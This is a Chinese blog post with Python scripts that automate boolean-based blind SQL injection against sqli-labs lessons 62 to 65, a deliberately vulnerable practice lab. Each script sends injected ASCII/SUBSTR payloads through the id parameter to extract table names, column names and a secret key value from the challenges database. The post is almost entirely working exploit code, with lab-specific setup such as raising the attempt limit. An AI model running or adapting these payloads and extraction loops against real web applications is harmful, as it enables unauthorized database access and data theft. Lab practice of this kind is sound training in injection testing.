sqli-labs(Less62-65)布尔类型脚本
2022/2/7 2:12:57
本文主要是介绍sqli-labs(Less62-65)布尔类型脚本,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
- 前言
- Less-62
- Less-63
- Less-64
- Less-65
前言
运行前需要下载requests
和lxml
包,修改url和referer的参数值,改index.php
中$times= 13000
,重置一下challenges
数据库。
Less-62
import requests from lxml import etree """ Less-62布尔类型爆破脚本 改源码$times= 13000,重置一下challenges数据库,然后启动程序,包没下先pip下载 原理是按照payload循环字典,根据响应的长度,判断正确答案 """ url = 'http://192.168.31.242/sqli-labs/Less-62/' headers = {'referer':'http://192.168.31.242/sqli-labs/Less-62/', 'cookie':'challenge=123; PHPSESSID=dc2akh4kagv4jqvc1f78'} payload_key = "?id=" list_range = list(range(97,123))+[95]+[44]+list(range(65,91))+list(range(48,58)) #匹配a-z _ A-Z , 0-9 request_times = 0 alltb_payload = """') or (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="{}"),{},1)))={}%23""" allcol_payload = """') or ascii(substr((select group_concat(column_name)from information_schema.columns where table_schema="{}" and table_name="{}" ),{},1))={}%23""" allvalue_payload = """') or ascii(substr((select group_concat({})from {}.{}),{},1))={}%23""" def same(payload,*params): global request_times oneword_index = 1 tb_word = "" while True: for i in list_range: # group_concat把所有表名写到一个记录里 payload3 = payload_key+payload.format(*params,oneword_index,i) a = requests.get(url+payload3,headers=headers) request_times += 1 html = etree.HTML(a.text) tip = html.xpath("//font[@color='#00FFFF']/text()") if len(tip) != 0: oneword = chr(i) tb_word += oneword break else: break oneword_index += 1 return tb_word def main(): sel_db = 'challenges' all_tb = same(alltb_payload,sel_db) print(sel_db+"库里的表:"+all_tb) print('-'*100) sel_tb = all_tb all_col = same(allcol_payload,sel_db,sel_tb) print(sel_tb+'表里的字段:'+all_col) print('-'*100) key = all_col.split(',')[2] sel_col = key all_values = same(allvalue_payload,sel_col,sel_db,sel_tb) print(sel_col+'的值:'+all_values) print('-'*100) print('一共请求了'+str(request_times)+'次') if __name__ == '__main__': main()
Less-63
import requests from lxml import etree """ Less-63布尔类型爆破脚本 改源码$times= 13000,重置一下challenges数据库,然后启动程序,包没下先pip下载 原理是按照payload循环字典,根据响应的长度,判断正确答案 """ url = 'http://192.168.31.242/sqli-labs/Less-63/' headers = {'referer':'http://192.168.31.242/sqli-labs/Less-63/', 'cookie':'challenge=123; PHPSESSID=dc2akh4kagv4jqvc1f78'} payload_key = "?id=" list_range = list(range(97,123))+[95]+[44]+list(range(65,91))+list(range(48,58)) #匹配a-z _ A-Z , 0-9 request_times = 0 alltb_payload = """' or (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="{}"),{},1)))={}%23""" allcol_payload = """' or ascii(substr((select group_concat(column_name)from information_schema.columns where table_schema="{}" and table_name="{}" ),{},1))={}%23""" allvalue_payload = """' or ascii(substr((select group_concat({})from {}.{}),{},1))={}%23""" def same(payload,*params): global request_times oneword_index = 1 tb_word = "" while True: for i in list_range: # group_concat把所有表名写到一个记录里 payload3 = payload_key+payload.format(*params,oneword_index,i) a = requests.get(url+payload3,headers=headers) request_times += 1 html = etree.HTML(a.text) tip = html.xpath("//font[@color='#00FFFF']/text()") if len(tip) != 0: oneword = chr(i) tb_word += oneword break else: break oneword_index += 1 return tb_word def main(): sel_db = 'challenges' all_tb = same(alltb_payload,sel_db) print(sel_db+"库里的表:"+all_tb) print('-'*100) sel_tb = all_tb all_col = same(allcol_payload,sel_db,sel_tb) print(sel_tb+'表里的字段:'+all_col) print('-'*100) key = all_col.split(',')[2] sel_col = key all_values = same(allvalue_payload,sel_col,sel_db,sel_tb) print(sel_col+'的值:'+all_values) print('-'*100) print('一共请求了'+str(request_times)+'次') if __name__ == '__main__': main()
Less-64
import requests from lxml import etree """ Less-64布尔类型爆破脚本 改源码$times= 13000,重置一下challenges数据库,然后启动程序,包没下先pip下载 原理是按照payload循环字典,根据响应的长度,判断正确答案 """ url = 'http://192.168.31.242/sqli-labs/Less-64/' headers = {'referer':'http://192.168.31.242/sqli-labs/Less-64/', 'cookie':'challenge=123; PHPSESSID=dc2akh4kagv4jqvc1f78'} payload_key = "?id=" list_range = list(range(97,123))+[95]+[44]+list(range(65,91))+list(range(48,58)) #匹配a-z _ A-Z , 0-9 request_times = 0 alltb_payload = """1)) and (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="{}"),{},1)))={}%23""" allcol_payload = """1)) and ascii(substr((select group_concat(column_name)from information_schema.columns where table_schema="{}" and table_name="{}" ),{},1))={}%23""" allvalue_payload = """1)) and ascii(substr((select group_concat({})from {}.{}),{},1))={}%23""" def same(payload,*params): global request_times oneword_index = 1 tb_word = "" while True: for i in list_range: # group_concat把所有表名写到一个记录里 payload3 = payload_key+payload.format(*params,oneword_index,i) a = requests.get(url+payload3,headers=headers) request_times += 1 html = etree.HTML(a.text) tip = html.xpath("//font[@color='#00FFFF']/text()") if len(tip) != 0: oneword = chr(i) tb_word += oneword break else: break oneword_index += 1 return tb_word def main(): sel_db = 'challenges' all_tb = same(alltb_payload,sel_db) print(sel_db+"库里的表:"+all_tb) print('-'*100) sel_tb = all_tb all_col = same(allcol_payload,sel_db,sel_tb) print(sel_tb+'表里的字段:'+all_col) print('-'*100) key = all_col.split(',')[2] sel_col = key all_values = same(allvalue_payload,sel_col,sel_db,sel_tb) print(sel_col+'的值:'+all_values) print('-'*100) print('一共请求了'+str(request_times)+'次') if __name__ == '__main__': main()
Less-65
import requests from lxml import etree """ Less-65布尔类型爆破脚本 改源码$times= 13000,重置一下challenges数据库,然后启动程序,包没下先pip下载 原理是按照payload循环字典,根据响应的长度,判断正确答案 """ url = 'http://192.168.31.242/sqli-labs/Less-65/' headers = {'referer':'http://192.168.31.242/sqli-labs/Less-65/', 'cookie':'challenge=123; PHPSESSID=dc2akh4kagv4jqvc1f78'} payload_key = "?id=" list_range = list(range(97,123))+[95]+[44]+list(range(65,91))+list(range(48,58)) #匹配a-z _ A-Z , 0-9 request_times = 0 alltb_payload = """1") and (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="{}"),{},1)))={}%23""" allcol_payload = """1") and ascii(substr((select group_concat(column_name)from information_schema.columns where table_schema="{}" and table_name="{}" ),{},1))={}%23""" allvalue_payload = """1") and ascii(substr((select group_concat({})from {}.{}),{},1))={}%23""" def same(payload,*params): global request_times oneword_index = 1 tb_word = "" while True: for i in list_range: # group_concat把所有表名写到一个记录里 payload3 = payload_key+payload.format(*params,oneword_index,i) a = requests.get(url+payload3,headers=headers) request_times += 1 html = etree.HTML(a.text) tip = html.xpath("//font[@color='#00FFFF']/text()") if len(tip) != 0: oneword = chr(i) tb_word += oneword break else: break oneword_index += 1 return tb_word def main(): sel_db = 'challenges' all_tb = same(alltb_payload,sel_db) print(sel_db+"库里的表:"+all_tb) print('-'*100) sel_tb = all_tb all_col = same(allcol_payload,sel_db,sel_tb) print(sel_tb+'表里的字段:'+all_col) print('-'*100) key = all_col.split(',')[2] sel_col = key all_values = same(allvalue_payload,sel_col,sel_db,sel_tb) print(sel_col+'的值:'+all_values) print('-'*100) print('一共请求了'+str(request_times)+'次') if __name__ == '__main__': main()
这篇关于sqli-labs(Less62-65)布尔类型脚本的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-06-05做软件测试需要懂代码吗?
- 2024-06-0514-ShardingSphere的分布式主键实现
- 2024-06-03为什么以及如何要进行架构设计权衡?
- 2024-05-31全网首发第二弹!软考2024年5月《软件设计师》真题+解析+答案!(11-20题)
- 2024-05-31全网首发!软考2024年5月《软件设计师》真题+解析+答案!(21-30题)
- 2024-05-30【Java】百万数据excel导出功能如何实现
- 2024-05-30我们小公司,哪像华为一样,用得上IPD(集成产品开发)?
- 2024-05-30java excel上传--poi
- 2024-05-30安装笔记本应用商店的pycharm,再安排pandas等模块,说是没有打包工具?
- 2024-05-29java11新特性